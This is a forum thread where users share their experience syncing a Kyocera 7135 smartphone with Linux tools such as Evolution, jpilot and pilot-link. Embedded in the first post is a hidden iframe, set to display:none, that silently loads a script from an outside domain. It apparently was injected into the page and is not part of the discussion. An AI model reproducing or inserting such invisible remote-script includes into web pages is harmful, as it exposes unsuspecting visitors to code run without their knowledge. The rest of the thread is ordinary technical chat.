+ Reply to Thread

Linux Users...Can you sync?

Has anyone tried syncing the 7135 w/ Evolution or any other Linux mail client?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I found a thread on another site that suggests it works!!

https://listman.redhat.com/pipermail...ry/010930.html

Now, I just need to see if it syncs w/ Exchange if using the Ximian Connector!!

Anyone tried syncing to a linux box?

Anyone tried syncing to a linux box? I figure it shouldn't be that difficult, because the sync looks similar to the standard Palm hotsync, but I have trepidation about being the first to try. Anyone synced a Kyo to linux (and especially the 7135!), and what were your experiences?

I have a 6035 and have synced with linux using jpilot for a long while. Let me know if you encountered any problem.

ep

Re: Anyone tried syncing to a linux box?

Originally posted by rodionpunk
    Anyone tried syncing to a linux box? I figure it shouldn't be that difficult, because the sync looks similar to the standard Palm hotsync, but I have trepidation about being the first to try. Anyone synced a Kyo to linux (and especially the 7135!), and what were your experiences?
    I've actually never sync'ed with anything but Linux boxen. Strike that, I sync'ed with a Windows box once. . .. *shiver* Needless to say, a hard reset soon followed

Truthfully, there is no reason you can't go from Linux to Windows to Mac and back with your sync'ing. I just always use Linux first with pilot-link and jpilot. That way I can manually set my username and userid.
    --ep

Ditto here .. only ever synced the 7135 with a linux box.

No problems in Mandrake 9.0 going directly to Evolution using the gnome pilot settings and conduits.

So far, I'm only using the serial connection because I haven't had time to fiddle with the USB, but I plan to get that figured out soon, too.

Seems to me like this thing was made for linux.